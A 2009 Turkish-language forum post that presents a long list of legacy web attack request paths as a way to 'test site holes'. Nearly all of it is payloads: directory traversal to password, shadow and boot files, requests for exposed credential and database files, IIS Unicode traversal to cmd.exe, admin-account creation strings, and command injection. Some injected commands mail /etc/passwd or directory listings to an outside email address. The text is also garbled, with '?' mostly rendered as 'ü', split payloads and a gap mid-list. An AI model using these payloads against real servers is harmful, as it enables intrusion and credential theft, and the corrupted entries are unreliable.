7 March 2009, 07:12
|
|
Senior Member
|
|
Kayıt Tarihi: 28 February 2009
Mesajlar: 341
Konular:
|
|
Web Sitesi Aciklarini Test etmek
Asagidaki kodlar sayesinde , site aciklarini test edebilirsiniz...
Yada bir schript program sayesindede bunu yapabilirsiniz...
Kodlar
Kod:
/./
/..
/../..
/..../
/....../
/....../
/......../
/~
/+/
/+./
/++/
/++./
/%00/
:2301
/2600-cgi/ezmlm-cgi
/%2E%2E
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
/%2E%2E/%2E%2E/Program%20Files/AnalogX/SimpleServer/www/server.log
:3000/../../hosts
:3128/../../../../
:3128/../../../conf/Eserv.ini
:444/..........autoexec.bat
:5000/
:800/../..
:8000/cgi/wja?page=wja
:8000/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
:8000/servlet/jsp/../../tst.txt
:8000/servlet/ssifilter/../../test.jsp
:8002/Newuser?Image=../../database/rbsserv.mdb
:8003/Display
:800/C:/
:8010/
:8010//
:8010/..../
:8010/c://
:8010/d://
:8010/Guide/../../../../../../../../../../../../../../../etc/shadow
:8010/Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings
:801/../../../../../../../../etc/hosts
:8080/anything.jsp
:8080/../../../conf/Eserv.ini
:8080/examples/jsp/snp/anything.snp
:8080/tea/dynamic/system/teaservlet/Adminüadmin=true
:8088
:80/../../../autoexec.bat
:8100//WEB-INF/
:8100//WEB-INF/webapp.properties
:8100//WEB-INF/web.xml
:8383
:8888/
:8888/ab2/@Ab2Admin
:8888/cgi-bin/admin/admin
:8888/cgi-bin/admin/adminücommand=add_user&uid=percebe&password=perceb e&re_password=percebe
:8987/sawmillürfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
:9000/cgi-bin/query%3f
:901
:9090
:9090/board.html
:9090/examples/applications/bboard/bboard_frames.html
:9090/servlet/com.sun.server.http.pagecompile.jsp92.JspServlet/board.html
:9998/
/.access
/achg.htr
/active.log
/ad.cgiüfile=../../../../../../../../etc/hosts
/admin/
/admin.cgi
/Admin_files/order.log
/admin.htm
/admin.html
/admin/includes/
/admin.php3
/admin.php3üadmin=whatever
/admin.pl
/admin-serv/config/admpw
/admin.shtml
/admisapi/fpadmin.htm
/ads/admin.cgi
/ads/adpassword.txt
/adsamples/config/site.csc
/AdvWorks/equipment/catalog_type.asp
/advworks/equipment/catalog_type.asp
/aexp2.htr
/aexp3.htr
/aexp4b.htr
/aglimpse
/Album/ümode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F.. %2F..%2Fetc&dispsize=640&start=0
/aliredir.exe
/....../ all
/../../../../ all
/amadmin.pl
/AnalogX
/anot3.htr
/AnyForm2
/anything.jsp
/architext_query.pl
/args.bat
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/AT-admin.cgi
/auctionweaver.pl
/_AuthChangeUrl
/_AuthChangeUrlü
/authors.pwd
/....../autoexec.bat
/........./autoexec.bat
/......autoexec.bat
/aux
/bash
/.bash_history
/bb-dnbd/bb-hist.sh
/bboard_frames.html
/beaninfo.cfm
/bigconf.cgi
/~bin
/~bin/
/bin
/bin/
/bin/common/user_update_admin.pl
/bin/common/user_update_passwd.plüuser_id=V&firstname=FI&lastn ame=LA&course_id=SID&password1=NEWPWD&password2=NE WPWD
/bizdb1-search.cgi
/blabla.ida
/blabla.idc
/blabla.idq
/blabla.idw
/bnbform
/bnbform.cgi
/../../../../../../../boot.ini
/../../boot.ini
/build.cgi
/campas
/carbo.dll
/cart32.exe
/cart.cgi
/catalog.nsf
/catalog.nsf/
/ccbill/
/ccbill/secure/ccbill.log
/cd/../config/html/cnf_gi.htm
/cfappman/index.cfm
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfmüTemplate=
/cfdocs/exampleapp/email/application.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/exampleapp/email/getfile.cfmüfilename=c:�oot.ini
/cfdocs/exampleapp/email/getfile.cfmüfilename=c:�oot.ini
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/exampleapp/publish/admin/application.cfm
/cfdocs/examples/cvbeans/beaninfo.cfm
/cfdocs/examples/CVLibrary/GetFile.CFMüFT=Text&FST=Plain&FilePath=C:�oot.ini
/cfdocs/examples/httpclient/mainframeset.cfm
/cfdocs/examples/parks/detail.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/sendmail.cfm
/cfdocs/expelvel/openfile.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expressions.cfm
/cfdocs/MOLE.CFM
/cfdocs/root.cfm
/cfdocs/snippets/evaluate.cfm
/cfdocs/snippets/fileexist.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/gettempdirectory.cfm
/cfdocs/snippets/setlocale.cfm
/cfdocs/snippets/viewexample.cfm
/cfdocs/snippets/viewexample.cfmüTagname=
/cfdocs/TOXIC.CFM
/cfdocs/zero.cfm
/CFIDE/Administrator/startstop.html
/cfide/Administrator/startstop.html
/cfmlsyntaxcheck.cfm
/cfusion/cfapps/forums/data/forums.mdb
/cfusion/cfapps/forums/forums_.mdb
/cfusion/cfapps/security/data/realm.mdb
/cfusion/cfapps/security/realm_.mdb
/cfusion/database/cfexamples.mdb
/cfusion/database/cfsnippets.mdb
/cfusion/database/cypress.mdb
/cfusion/database/smpolicy.mdb
/cgi
/cgi/
/cgi-bin
/cgi-bin/
/cgibin
/cgibin/
/cgi-bin/abuse.manüfile=&domain=&script=
/cgi-bin/ad.cgiüfile=../../../../../../../../etc/hosts
/cgi-bin/add_ftp.cgi
/cgi-bin/admin.cgi
/cgi-bin/Admin_files/order.log
/cgi-bin/adp
/cgi-bin/adpassword.txt
/cgi-bin/ads.cgi
/cgi-bin/ads.setup
/cgi-bin/af.cgi
/cgi-bin/aglimpse
/cgi-bin/alibaba.pl
/cgi-bin/alibaba.pl|dir
/cgi-bin/alibaba.pl|dir
/cgi-bin/aliredir.exe
/cgi-bin/allmanage/adp
/cgi-bin/allmanage.cgi
/cgi-bin/allmanage/k
/cgi-bin/allmanage.pl
/cgi-bin/allmanage/settings.cfg
/cgi-bin/allmanageup.pl
/cgi-bin/allmanage/userfile.dat
/cgibin/amadmin.plüsetpasswd
/cgi-bin/AnyBoard.cgi
/cgi-bin/anyboard.cgi
/cgi-bin/AnyForm
/cgi-bin/AnyForm2
/cgi-bin/archie
/cgi-bin/architext_query.cgi
/cgi-bin/architext_query.pl
/cgi-bin/ash
/cgi-bin/AT-admin.cgi
/cgi-bin/AT-generate.cgi
/cgi-bin/authorize/dbmfiles/users
/cgi-bin/awl/auctionweaver.pl
/cgi-bin/awl/auctionweaver.plüflag1=1&catdir=................&f romfile=Boot.ini
/cgi-bin/ax-admin.cgi
/cgi-bin/ax.cgi
/cgi-bin/axs.cgi
/cgi-bin/bash
/cgi-bin/bb-ack.sh
/cgi-bin/bb-dnbd
/cgi-bin/bb-histlog.sh
/cgi-bin/bb-hist.sh
/cgi-bin/bb-hist.shüHISTFILE=../../../../../../etc/hosts
/cgi-bin/bb-hist.shüHISTFILE=/home/*
/cgi-bin/bb-hostsvc.sh
/cgi-bin/bb-hostsvc.shüHOSTSVC=/../../../../../../../../etc/hosts
/cgi-bin/bb-replog.sh
/cgi-bin/bb-rep.sh
/cgi-bin/bigconf.cgi
/cgi-bin/bigconf.cgi all
/cgi-bin/bizdb1-search.cgi
/cgi-bin/bizdb1-search.cgiütemplate=bizdb-summary&dbname=;ls|mail%[email protected]|& f6=^a.*&action=searchdbdisplay
/cgi-bin/blabla?%0a/bin/cat%20/etc/passwd
/cgi-bin/bnbform
/cgi-bin/bnbform.cgi
/cgi-bin/bnbform.pl
/cgi-bin/build.cgi
/cgi-bin/cached_feed.cgiü../../../.+/etc/hosts
/cgi-bin/cachemgr.cgi
/cgi-bin/calendar
/cgi-bin/calender_admin.pl
/cgi-bin/calender.pl
/cgi-bin/campas
/cgi-bin/campasü%0acat%0a/etc/passwd%0a
/cgi-bin/carbo.dll
/cgi-bin/cart32.exe/expdate
/cgi-bin/cart.pl
/cgi-bin/cat
/cgi-bin/cgiemail/uargg.txt
/cgi-bin/cgiforum.cgiüthesection=../../../../../../etc/hosts%00
/cgi-bin/cgiforum.plüthesection=../../../../../../etc/hosts%00
/cgi-bin/cgi-lib.pl
/cgi-bin/CGImail.exe
/cgi-bin/cgimail.exe
/cgi-bin/Cgitest.exe
/cgi-bin/cgitest.exe
/cgi-bin/cgiwrap
/cgi-bin/cgiwrap
/cgi-bin/classified.cgi
/cgi-bin/classifieds
/cgi-bin/classifieds.cgi
/cgi-bin/clickresponder.pl
/cgi-bin/cmd.exe
/cgi-bin/.cobalt/siteUserMod.cgi
/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
/cgi-bin/commander.pl
/cgi-bin/cookmail
/cgi-bin/cookmail/cookmail
/cgi-bin/cookmail/cookmail.exe
/cgi-bin/core
/cgi-bin/Count.cgi
/cgi-bin/count.cgi
/cgi-bin/counterbanner
/cgi-bin/counterbanner-ord
/cgi-bin/counterfiglet
/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
/cgi-bin/counterfiglet-ord
/cgi-bin/counter-ord
/cgi-bin/cpmdaemon.cgi
/cgi-bin/csh
/cgi-bin/cvsweb.cgi
/cgi-bin/data/nicks
/cgi-bin/date
/cgi-bin/day5datacopier.cgi
/cgi-bin/day5datanotifier.cgi
/cgi-bin/day5notifier
/cgi-bin/db2www/library/document.d2w/reportüuid=UNKNOWN&pwd=&search_type=SIMPLE&r_host= &last_page=db2www0022.html&fn=db2www.html
/cgi-bin/dbman/db.cgi
/cgi-bin/dbmlparser.exe
/cgi-bin/dcforum/install_help.cgi
/cgi-bin/dcguest.cgi
/cgi-bin/dcguest/dcguest.cgi
/cgi-bin/dfire.cgi
/cgi-bin/dig.cgi
/cgi-bin/disk2server.cgi
/cgi-bin/dnewsweb
/cgi-bin/donothing
/cgi-bin/download.cgi
/cgi-bin/dumpenv
/cgi-bin/dumpenv.pl
/cgi-bin/echo
/cgi-bin/echo.bat
/cgi-bin/edit.pl
/cgi-bin/edit.pl
/cgi-bin/environ.cgi
/cgi-bin/environ.pl
/cgi-bin/everythingform.cgiüconfig=../../../../../../../../bin/ping&Name=xx&[email protected]
/cgi-bin/ews
/cgi-bin/excite
/cgi-bin/ezmlm-cgi
/cgi-bin/faxsurvey
/cgi-bin/faxsurveyü/bin/ls%20-a
/cgi-bin/.fhp
/cgi-bin/fi
/cgi-bin/fiü/etc/passwd
/cgi-bin/filemail
/cgi-bin/filemail.cgi
/cgi-bin/filemail.pl
/cgi-bin/files.pl
/cgi-bin/finger
/cgi-bin/finger.cgi
/cgi-bin/finger.cgiüaction=archives&cmd=specific&&filename= 99.10.28.15.23.username.|/bin/ls|
/cgi-bin/finger?@localhost
/cgi-bin/finger.pl
/cgi-bin/[email protected]%3B%2Fbin%2Fmail+riotnation@ hotmail.com+%3C+etc%2Fpasswd
/cgi-bin/flexform
/cgi-bin/flexform.cgi
/cgi-bin/foo.cmdüxxx&dir
/cgi-bin/FormHandler.cgi
/cgi-bin/formhandler.cgi
/cgi-bin/FormMail.pl
/cgi-bin/formmail.pl
/cgi-bin/formprocessor.aspü[email protected]&Ma [email protected]&Message=tst&MailTemplate1=/cgi-bin/formprocessor.asp
/cgi-bin/formto.pl
/cgi-bin/fortune
/cgi-bin/forum-admin.pl
/cgi-bin/forumdisplay.cgi
/cgi-bin/forum.pl
/cgi-bin/fpcount.exe
/cgi-bin/fpexplore.exe
/cgi-bin/fpexplorer.exe
/cgi-bin/ftpdiag.cgi
/cgi-bin/ftp/ftp.plüdir=../../../../../../etc
/cgi-bin/futureforum.cgi
/cgi-bin/gbook.cgiü_MAILTO=xx;ls
/cgi-bin/get16.exe
/cgi-bin/get32.exe
/cgi-bin/get32.exe|dir
/cgi-bin/getdoc.cgi
/cgi-bin/gH.cgi
/cgi-bin/glimpse
/cgi-bin/guestadd.pl
/cgi-bin/guestbook.cgi
/cgi-bin/guestbook.pl
/cgi-bin/GW5
/cgi-bin/GW5/GWWEB.EXE
/cgi-bin/GW5/GWWEB.EXEüHELP=bad-request
/cgi-bin/GW5/GWWEB.EXEüHELP=../../../../../index
/cgi-bin/GWWEB.EXE
/cgi-bin/handler
/cgi-bin/handler.cgi
/cgi-bin/h*llo.bat
/cgibin/htgrep/file=index.html&hdr=/etc/hosts
/cgi-bin/htimage.exe
/cgi-bin/htmldocs
/cgi-bin/html_pageüTEMPLATE=main
/cgi-bin/htmlscript
/cgi-bin/htmlscriptü../../../../../../etc/passwd
/cgi-bin/htsearch
/cgi-bin/htsearchüexclude=%60%60
/cgi-bin/icat
/cgi-bin/iisadmpwd/achg.htr
/cgi-bin/iisadmpwd/aexp2.htr
/cgi-bin/iisadmpwd/aexp.htr
/cgi-bin/iisadmpwd/anot.htr
/cgi-bin/imagemap
/cgi-bin/imagemap.c
/cgi-bin/imagemap.exe
/cgi-bin/imapcern.exe
/cgi-bin/imapncsa.exe
/cgi-bin/info2html
/cgi-bin/info2www
/cgi-bin/info2wwwü(../../../../../../../bin/mail [email protected]+c:InetPubwwwrootcmd.pl+&+.p l
/perl.exe
/perl/files.pl
/perlshop.cgi
/pfdisplay.cgi
/phf
/photoads/
/photoads/cgi-bin/
/photoads/cgi-bin/env.cgi
/.photon/voyager/config.full
/php.cgi
/phpgroupware/inc/phpgwapi/phpgw.inc.php
/phpPhotoAlbum/getalbum.php?album=../../../etc/
/ping all
/pingüSomeCrapHere
/piranha/secure/passwd.php3
/piranha/secure/passwd.php3üusername=piranha&passwd=q
/pollit
/Poll_It_SSI_v2.0.cgi
/Poll_It_v2.0.cgi
/post16.exe
/ppwb/Temp/
/ppwd
/prd.i/pgen/
/printenv
/_private
/_private/form_results.htm
/_private/form_results.txt
/_private/orders.htm
/_private/orders.txt
/_private/orders.txt
/_private/register.htm
/_private/register.txt
/_private/register.txt
/_private/registrations.htm
/_private/registrations.txt
/_private/shopping_cart.mdb
/products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/
/pservlet.html
/PSUser/PSCOErrPage.htm
/publisher/
/pw/storemgr.pw
/quikstore.cfg
/random_banner/index.cgiüimage_list=alternative_image.list&html_f ile=../../../../../etc/hosts
/random_banner/index.cgiüimage_list=alternative_image.list&html_f ile=|ls%20-la|
/redir.cgi
/redirect.cgi
/redirect.pl
/redir.pl
/repost.asp
/rguest.exe
/robots.txt
/~root
/~root/
/root/
/rpm_query
/rsh
/rwwwsh*ll.pl
/s97_cgi.exe
/s_97.vts
/sam._
/samples/
/samples/search/queryhit.htm
/~sbin/
/script/
/scripts
/scripts/
/scripts/alibaba.pl|dir
/scripts/args.bat
/scripts/args.cmd
/scripts/awl/auctionweaver.pl
/scripts/bdir.htr
/scripts/bigconf.cgi
/scripts/..%c0%af../winnt/system32/cmd.exeü/c+dir+c:
/scripts/..%c1%1c../winnt/system32/cmd.exeü/c+dir+c:
/scripts/..%c1%9c../winnt/system32/cmd.exeü/c+dir+c:
/scripts/c32web.exe/ChangeAdminPassword
/scripts/Carello/add.exe
/scripts/cart32.exe/cart32clientlist
/scripts/cart32.exe/cart32clientlistüpasswd=wemilo
/scripts/CGImail.exe
/scripts/cgimail.exe
/scripts/Cgitest.exe
/scripts/../../cmd.exe
/scripts/cmd.exe
/scripts/../../cmd.exeü%2FC+echo+"hacked!">c:h*llo.bat
/scripts/convert.bas
/scripts/counter.exe
/scripts/cpshost.dll
/scripts/..%d0%af../winnt/system32/cmd.exeü/c+dir+c:
/scripts/..%d1%9c../winnt/system32/cmd.exeü/c+dir+c:
/scripts/dbman/db.cgiüdb=invalid-db
/scripts/dbman/db.cgiüdb=tedb
/scripts/dbmlparser.exe
/scripts/emurl/RECMAN.dll
/scripts/emurl/RECMAN.dllü
/scripts/excite
/scripts/files.pl
/scripts/foo.cmdüxxx&dir
/scripts/Fpadmcgi.exe
/scripts/fpcount.exe
/scripts/fpexplorer.exe
/scripts/get32.exe|dir
/scripts/GW5/GWWEB.EXE
/scripts/htimage.exe
/scripts/iisadmin/bdir.htr
/scripts/iisadmin/bdir.htr?dir=htüüc:
/scripts/iisadmin/default.htm
/scripts/iisadmin/ism.dll
/scripts/iisadmin/ism.dll%3fhttp/dir
/scripts/iisadmin/ism.dllühttp/dir
/scripts/iisadmin/ism.dllühttp/dir%20..../
/scripts/iisadmin/samples/ctgestb.htx
/scripts/iisadmin/samples/ctgestb.idc
/scripts/iisadmin/samples/details.htx
/scripts/iisadmin/samples/details.idc
/scripts/iisadmin/samples/query.htx
/scripts/iisadmin/samples/query.idc
/scripts/iisadmin/samples/register.htx
/scripts/iisadmin/samples/register.idc
/scripts/iisadmin/samples/sample2.htx
/scripts/iisadmin/samples/sample.htx
/scripts/iisadmin/samples/sample.idc
/scripts/iisadmin/samples/viewbook.htx
/scripts/iisadmin/samples/viewbook.idc
/scripts/iisadmin/tools/ct.htx
/scripts/iisadmin/tools/ctss.idc
/scripts/iisadmin/tools/dsnform.exe
/scripts/iisadmin/tools/getdrvrs.exe
/scripts/iisadmin/tools/mkilog.exe
/scripts/iisadmin/tools/newdsn.exe
/scripts/imagemap.exe
/scripts/input2.bat
/scripts/input.bat
/scripts/issadmin/bdir.htr
/scripts/mlog.html
/scripts/mylog.html
/scripts/no-such-file.pl
/scripts/perl
/scripts/perlü
/scripts/perl.exe
/scripts/pfieffer.bat
/scripts/pfieffer.cmd
/scripts/phpmlog.phtml
/scripts/phpmylog.phtml
/scripts/plusmail
/scripts/postinfo.asp
/scripts/process_bug.cgi
/scripts/proxy/w3proxy.dll
/scripts/pu3.pl
/scripts/queryümss=../config
/scripts/repost.asp
/scripts/repost.asp
/scripts/rguest.exe
/scripts/run.exe
/scripts/samples/ctguestb.idc
/scripts/samples/details.idc
/scripts/samples/search/author.idq
/scripts/samples/search/filesize.idq
/scripts/samples/search/filetime.idq
/scripts/samples/search/queryhit.idq
/scripts/samples/search/queryhit.idqüCiRestriction=%23FILENAME%3D*.pwd&CiM axRecordsPerPage=10&CiScope=%2F&TemplateName=query hit&CiSort=rank%5Bd%5D&HTMLQueryForm=%2Fsamples%2F search%2Fqueryhit.htm
/scripts/samples/search/queryhit.idqüCiRestriction=%23FILENAME%3D*.pwl&CiM axRecordsPerPage=10&CiScope=%2F&TemplateName=query hit&CiSort=rank%5Bd%5D&HTMLQueryForm=%2Fsamples%2F search%2Fqueryhit.htm
/scripts/samples/search/simple.idq
/scripts/samples/search/webhits.exe
/scripts/script.bat%3f&dir
/scripts/script.cmd%3f&dir
/scripts/scriptssnorkerz.bat
/scripts/scriptssnorkerz.cmd
/scripts/search.cgiületter=........winnt
/scripts/slxweb.dll
/scripts/slxweb.dll/admin
/scripts/test.bat
/scripts/test.exe
/scripts/tools/dsnform.exe
/scripts/tools/getdrvrs.exe
/scripts/tools/getdrvs.exe
/scripts/tools/mkilog.exe
/scripts/tools/newdsn.exe
/scripts/tools/newdsn.exe%3fdriver=Microsoft%2BAccess%2BDriver%2B %28*.mdb%29&dsn=Web%20SQL&dbq=c:web.mdb&newdb=CREA TE_DB&attr=
/scripts/tst.bat|dir
/scripts/upload.asp
/scripts/upload.asp
/scripts/uploader.exe
/scripts/uploadn.asp
/scripts/uploadx.asp
/scripts/visadmin.exe
/scripts/wa.exe
/scripts/webbbs.exe
/scripts/wguest.exe
/scripts/win-c-sample.exe
/scripts/wsisa.dll
|
Normal
